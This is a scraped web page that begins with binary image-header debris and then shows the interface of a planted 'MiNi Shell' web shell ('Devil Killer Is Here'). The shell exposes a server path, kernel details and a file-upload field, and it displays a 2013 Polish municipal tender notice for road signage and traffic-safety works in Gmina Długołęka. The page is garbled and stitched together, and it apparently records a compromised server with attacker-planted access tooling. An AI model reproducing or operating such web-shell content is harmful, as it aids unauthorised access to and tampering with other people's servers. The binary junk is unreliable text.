JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/41492-N-2013.html

<p class="kh_header"><b>Mirków: ROBOTY BUDOWLANE POLEGAJĄCE NA MONTAŻU OZNAKOWANIA DROGOWEGO, URZĄDZEŃ BEZPIECZEŃSTWA RUCHU DROGOWEGO I TABLIC Z NAZWAMI ULIC NA TERENIE GMINY DŁUGOŁĘKA</b><br>
<b>Numer ogłoszenia: 41492 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Długołęka , Długołęka, ul. Robotnicza 12, 55-095 Mirków, woj. dolnośląskie, tel. 71 323 02 03, faks 71 323 02 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.dlugoleka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY BUDOWLANE POLEGAJĄCE NA MONTAŻU OZNAKOWANIA DROGOWEGO, URZĄDZEŃ BEZPIECZEŃSTWA RUCHU DROGOWEGO I TABLIC Z NAZWAMI ULIC NA TERENIE GMINY DŁUGOŁĘKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonywanie robót budowlanych polegających na montażu wraz z dostawą oznakowania drogowego, urządzeń bezpieczeństwa ruchu drogowego, tablic z nazwami ulic na terenie Gminy Długołęka.
2.Przedmiot zamówienia, określony w ust. 1, obejmować będzie roboty budowlane w następującym zakresie:
1)wykonanie oznakowania poziomego dróg gminnych - w m2,
2)wykonanie i montaż kompletnego znaku drogowego typu E wyklejanego folią I generacji wraz z montażem słupków - w m2,
3)wykonanie i montaż kompletnego znaku drogowego typu E wyklejanego folią II generacji wraz z montażem słupków - w m2
4)wykonanie i montaż znaków drogowych wyklejanych folią I generacji wraz z montażem słupka - w sztukach, 
5)wykonanie i montaż znaków drogowych wyklejanych folią II generacji wraz z montażem słupka - w sztukach, 
6)wykonanie i montaż znaków drogowych wyklejanych folią I generacji na istniejącym słupku - w sztukach, 
7)wykonanie i montaż znaków drogowych wyklejanych folią II generacji na istniejącym słupku- w sztukach, 
8)naprawę uszkodzonego znaku drogowego poprzez pionowanie słupka ze znakiem - w sztukach,
9)wykonanie i montaż tabliczki uzupełniającej pod znakiem drogowym na istniejącym słupku - w sztukach,
10)wykonanie i dostawę gotowych znaków drogowych wyklejanych folią I generacji bez potrzeby ich montażu - w sztukach,
11)wykonanie i dostawę gotowych znaków drogowych wyklejanych folią II generacji bez potrzeby ich montażu - w sztukach,
12)wykonanie i dostawę gotowych tabliczek uzupełniających bez potrzeby ich montażu - w sztukach,
13)wykonanie i dostawę nowego słupka bez potrzeby jego montażu - w sztukach,
14)naprawę uszkodzonego znaku drogowego poprzez poprawienie mocowania tablicy znaku - w sztukach,
15)wykonanie i montaż dodatkowego słupka w razie potrzeby montażu jednego znaku na dwóch słupkach - w sztukach,
16)wymianę uszkodzonego słupka - w sztukach,
17)demontaż starego znaku drogowego wraz ze słupkiem - w sztukach,
18)demontaż starego znaku drogowego bez demontażu słupka - w sztukach,
19)demontaż wolno stojącego słupka - w sztukach,
20)wykonanie i montaż tablicy z nazwą ulicy wraz z montażem słupka - w sztukach,
21)wykonanie i montaż tablicy z nazwą ulicy na istniejącym słupku - w sztukach,
22)wykonanie i montaż lustra drogowego (okrągłego - 600mm) wraz z montażem słupka - w sztukach,
23)wykonanie i montaż lustra drogowego (prostokątnego 600x400mm) wraz z montażem słupka -w sztukach,
24)wykonanie i montaż progów zwalniających (500x400x50mm) - w mb,
25)demontaż progów zwalniających - w mb.
26)wymianę uszkodzonych barier ochronnych SP 01/2 - w mb,
27)wymianę uszkodzonych barier ochronnych SP 06/2 - w mb,
28)wymianę uszkodzonych lub montaż nowych barier ochronnych SP 06/4 - w mb,
29)wymianę uszkodzonych barier ochronnych SP 06/M/1z - w mb,
30)wymianę uszkodzonych barier ochronnych SP 07/4 - w mb,
31)wymianę uszkodzonych barier ochronnych SP 09/4 - w mb,
32)wymianę uszkodzonych poręczy mostowych - w mb,
33)regulację barier ochronnych - w mb,
34)wymianę lub montaż na barierach ochronnych punktowych elementów odblaskowych U-1c - w sztukach,
35)wymianę uszkodzonych bariero-poręczy U-11b z materiału Wykonawcy - w mb,
36)wykonanie lub wymianę wraz z montażem na drodze balustrad U-11a - w mb,
37)malowanie balustrad U - 11a - w mb,
38)wymianę wraz z montażem na drodze uszkodzonych wygrodzeń segmentowych - w mb,
39)wymianę uszkodzonych elementów ogrodzeń łańcuchowych U-12b - w mb,
40)malowanie ogrodzeń łańcuchowych U-12b - w mb,
41)malowanie wygrodzeń dla pieszych z dwóch przeciągów rurowych - w mb,
42)malowanie osłon przeciwporażeniowych - w mb,
43)wymianę znaków U-5a i C-9 (średnie) wraz ze słupkiem stalowym ocynkowanym o średnicy 60 mm mocowanym w tulei - w sztukach,
44)wymianę lub ustawienie słupków prowadzących U-1a - w sztukach,
45)wymianę lub ustawienie słupków prowadzących U-1b - w sztukach,
46)wymianę lub ustawienie słupków krawędziowych U-2 - w sztukach,
47)regulację pionową słupków prowadzących U-1a, U-1b i słupków krawędziowych U-2 - w sztukach,
48)naklejanie samoprzylepnych symboli cyfrowych U-1f, U-7 i U-8 na słupkach prowadzących - w sztukach,
49)ustawienie słupków referencyjnych z naniesieniem cech opisowych - w sztukach.
3.Zamawiający, w celu umożliwienia wykonawcom przygotowania oferty informuje, iż w roku 2012 zlecił Wykonawcy wykonanie roboty budowlanej polegającej na:
1)wykonaniu oznakowania poziomego dróg gminnych - 627,625 m2,
2)wykonanie i montaż kompletnego znaku drogowego typu E wyklejanego folią I generacji wraz z montażem słupków - 0 m2,
3)wykonanie i montaż kompletnego znaku drogowego typu E wyklejanego folią II generacji wraz z montażem słupków - 0 m2,
4)wykonaniu i montażu znaków drogowych wyklejanych folią I generacji wraz z montażem słupka - 98 szt.,
5)wykonaniu i montażu znaków drogowych wyklejanych folią II generacji wraz z montażem słupka - 9 szt., 
6)wykonaniu i montażu znaków drogowych wyklejanych folią I generacji na istniejącym słupku   25 szt., 
7)wykonaniu i montażu znaków drogowych wyklejanych folią II generacji na istniejącym słupku - 9 szt.,
8)naprawie uszkodzonego znaku drogowego poprzez pionowanie słupka ze znakiem -3 szt.,
9)wykonaniu i montażu tabliczki uzupełniającej pod znakiem drogowym na istniejącym słupku 115 szt.,
10)wykonaniu i dostawie gotowych znaków drogowych wyklejanych folią I generacji bez potrzeby ich montażu - 0 szt.,
11)wykonaniu i dostawie gotowych znaków drogowych wyklejanych folią II generacji bez potrzeby ich montażu - 0 szt.,
12)wykonaniu i dostawie gotowych tabliczek uzupełniających bez potrzeby ich montażu - 11 szt.,
13)wykonanie i dostawę nowego słupka bez potrzeby jego montażu - 0 szt.,
14)naprawie uszkodzonego znaku drogowego poprzez poprawienie mocowania tablicy znaku   10 szt.,
15)wykonanie i montaż dodatkowego słupka w razie potrzeby montażu jednego znaku na dwóch słupkach - 0 szt.
16)wymianie uszkodzonego słupka - 50 szt.,
17)demontażu starego znaku drogowego wraz ze słupkiem - 71 szt.,
18)demontażu starego znaku drogowego bez demontażu słupka - 25 szt.,
19)demontażu wolno stojącego słupka - 2 szt.,
20)wykonaniu i montażu tablicy z nazwą ulicy wraz z montażem słupka - 127 szt.,
21)wykonaniu i montażu tablicy z nazwą ulicy na istniejącym słupku - 216 szt.,
22)wykonaniu i montażu lustra drogowego (okrągłego - 600mm) wraz z montażem słupka - 0 szt.,
23)wykonaniu i montażu lustra drogowego (prostokątnego - 600x400mm) wraz z montażem słupka - 0 szt.,
24)wykonaniu i montażu progów zwalniających (500x400x50mm) - 59,5 mb.,
25)demontażu progów zwalniających - 4,5 mb,
26)wymianie uszkodzonych barier ochronnych SP 01/2 - 0 mb,
27)wymianie uszkodzonych barier ochronnych SP 06/2 - 0 mb,
28)wymianie uszkodzonych lub montażu nowych barier ochronnych SP 06/4 - 0 mb,
29)wymianie uszkodzonych barier ochronnych SP 06/M/1z - 0 mb,
30)wymianie uszkodzonych barier ochronnych SP 07/4 - 0 mb,
31)wymianie uszkodzonych barier ochronnych SP 09/4 - 0 mb,
32)wymianie uszkodzonych poręczy mostowych - 0 mb,
33)regulacji barier ochronnych - 0 mb,
34)wymianie lub montażu na barierach ochronnych punktowych elementów odblaskowych U-1c   0 szt.,
35)wymianie uszkodzonych bariero-poręczy U-11b z materiału Wykonawcy - 0 mb,
36)wykonaniu lub wymianie wraz z montażem na drodze balustrad U-11a - 0 mb,
37)malowaniu balustrad U - 11a - 0 mb,
38)wymianie wraz z montażem na drodze uszkodzonych wygrodzeń segmentowych - 0 mb,
39)wymianie uszkodzonych elementów ogrodzeń łańcuchowych U-12b - 0 mb,
40)malowaniu ogrodzeń łańcuchowych U-12b - 0 mb,
41)malowaniu wygrodzeń dla pieszych z dwóch przeciągów rurowych - 0 mb,
42)malowaniu osłon przeciwporażeniowych - 0 mb,
43)wymianie znaków U-5a i C-9 (średnie) wraz ze słupkiem stalowym ocynkowanym o średnicy 60 mm mocowanym w tulei - 0 szt.,
44)wymianie lub ustawieniu słupków prowadzących U-1a - 0 szt.,
45)wymianie lub ustawieniu słupków prowadzących U-1b - 0 szt.,
46)wymianie lub ustawieniu słupków krawędziowych U-2 - 0 szt.,
47)regulacji pionowej słupków prowadzących U-1a, U-1b i słupków krawędziowych U-2 - 0 szt.,
48)naklejaniu samoprzylepnych symboli cyfrowych U-1f, U-7 i U-8 na słupkach prowadzących   0 szt.,
49)ustawieniu słupków referencyjnych z naniesieniem cech opisowych - 0 szt.
UWAGA I: 
Roboty budowlane wymienione w punktach 2-3, 13, 15, 26-49 nie były realizowane przez Zamawiającego w latach poprzednich ze względu na fakt, że obejmują one byłą drogę krajową nr 8 i były realizowane przez Generalną Dyrekcję Dróg Krajowych i Autostrad.  
UWAGA II: 
Zamawiający informuje, iż zakresy wskazane powyżej mogą zostać zrealizowane w ilościach innych niż wskazane powyżej lub nie zostać zrealizowane w ogóle z uwagi na fakt, iż trwają prace legislacyjne nad projektem ustawy o zmianie ustawy o drogach publicznych, który dotyczy obciążenia poszczególnych samorządów kosztami utrzymania drogi, adekwatnie do kategorii drogi zastępowanej przez drogę nowo wybudowaną /projekt zmiany ustawy dostępny jest na stronie internetowej: http://sejmometr.pl/legislacja_projekty_ustaw/1080 
4.Wymagania dla poszczególnych zadań ujętych w zakresie przedmiotu zamówienia:
1)oznakowanie poziome dróg polegać będzie na malowaniu oznaczeń drogowych na powierzchni jezdni zgodnie z ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r., poz. 1137 ze zm.) oraz między innymi Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. nr 220, poz. 2181),
2)oznakowanie pionowe dróg polegać będzie na montażu znaków drogowych o średnicy i wymiarach zgodnych z ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r. poz. 1137 ze zm.) oraz między innymi Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. nr 220, poz. 2181):
a)wyklejanych folią odblaskową I generacji,
b)wyklejanych folią II generacji znaki: A-7, B-2, B-20, D-6, D-6a, D-6b,
c)lustra drogowe okrągłe (600mm) lub prostokątne (600x400mm), 
d)tablice z nazwami ulic umieszczonymi po dwóch stronach tablicy wykonanymi z blachy stalowej ocynkowanej, wyklejanych folią odblaskową I generacji wraz z herbem Gminy Długołęka, umieszczonych na słupkach stalowych ocynkowanych o średnicy 1,5 cala i wysokości 2,3 - 2,5 m nad poziomem terenu. Brzegi tablic winne być wzmocnione ramką z ocynkowanego kształtownika.
3)montaż urządzeń bezpieczeństwa ruchu drogowego ograniczających prędkość - progi zwalniające (500x400x50mm). 
4)montaż pozostałych urządzeń bezpieczeństwa ruchu drogowego.  
5.Szczegółowy zakres i przedmiot roboty budowlanej opisany jest w:
1)rozdziale I niniejszej siwz;
2)Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych;
3)przedmiarze robót budowlanych.
będących załącznikami do specyfikacji istotnych warunków zamówienia z dnia 17.01.2013r., zwanej siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie wyłonionemu Wykonawcy robót budowlanych zamówień uzupełniających (w zgodzie z dyspozycją art. 67 ust. 1 pkt 6 ustawy pzp).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.90-8, 34.99.22.00-9, 34.99.23.00-0, 34.99.60.00-5, 45.31.62.13-1, 38.57.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie żądał wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy spełnianią warunek określlony w art. 22 ust. 1 pkt 1 ustawy, jeżeli złożą oświadczenie, że posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy spełnianią warunek określlony w art. 22 ust. 1 pkt 2 ustawy, jeżeli złożą oświadczenie, iż posiadają wiedzę i doświadczenie pozwalające na wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy spełnianią warunek określlony w art. 22 ust. 1 pkt 3 ustawy, jeżeli złożą oświadczenie, iż dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy spełnianią warunek określlony w art. 22 ust. 3 pkt 1 ustawy, jeżeli złożą oświadczenie, iż dysponują osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy spełnianią warunek określlony w art. 22 ust. 1 pkt 4 ustawy, jeżeli złożą oświadczenie, iż posiadają potencjał ekonomiczny i finansowy pozwalający na wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonywanie zmian umowy zgodnie z art. 144 ustawy w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia następujących warunków:
1. warunki istotne, w szczególności:
1)zmiana terminu wykonania zamówienia ulegnie przesunięciu w przypadku skrócenia terminu realizacji inwestycji oraz przedłużenia w przypadku wystąpienia opóźnień wynikających z:
a)przestojów i opóźnień zawinionych przez Zamawiającego;
b)działania siły wyższej (np. klęski żywiołowej, strajków generalnych lub lokalnych) mającej bezpośredni wpływ na terminowość wykonania robót;
c)warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej 00 C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi itp.,
d)zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy, 
e)niewypałów i niewybuchów,
f)wykopalisk archeologicznych,
g)przedłużenia terminu realizacji umowy podstawowej w wyniku udzielenia Wykonawcy zamówień dodatkowych,
h)wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
2)gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia- 
Zamawiający dopuszcza możliwość zmiany umowy,
3)wprowadzenia podwykonawców bądź zmiany podwykonawców wskazanych w § 4 ust. 1 umowy.
2. warunki nieistotne, w szczególności:
1)wystąpienia omyłek pisarskich i rachunkowych,
2)zmiany formy organizacyjnej Wykonawcy (przekształcenie itp.),
3)zmiany osób nadzorujących wykonanie przedmiotu umowy,
4)zmiany rachunku bankowego,
5)zmiany obowiązujących przepisów prawa,
6)inne, które nie będą w sposób istotny ingerować w przedmiot zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dlugoleka.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Długołęka, Długołęka ul. Robotnicza 12, 55-095 poczta Mirków (pok. nr 14).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2013 godzina 10:00, miejsce: Urząd Gminy Długołęka, Długołęka ul. Robotnicza 12, 55-095 poczta Mirków (Biuro Podawcze - parter Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Robota budowlana nie będzie finansowana ze środków unijnych.
2. Wszelkie rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w złotych polskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com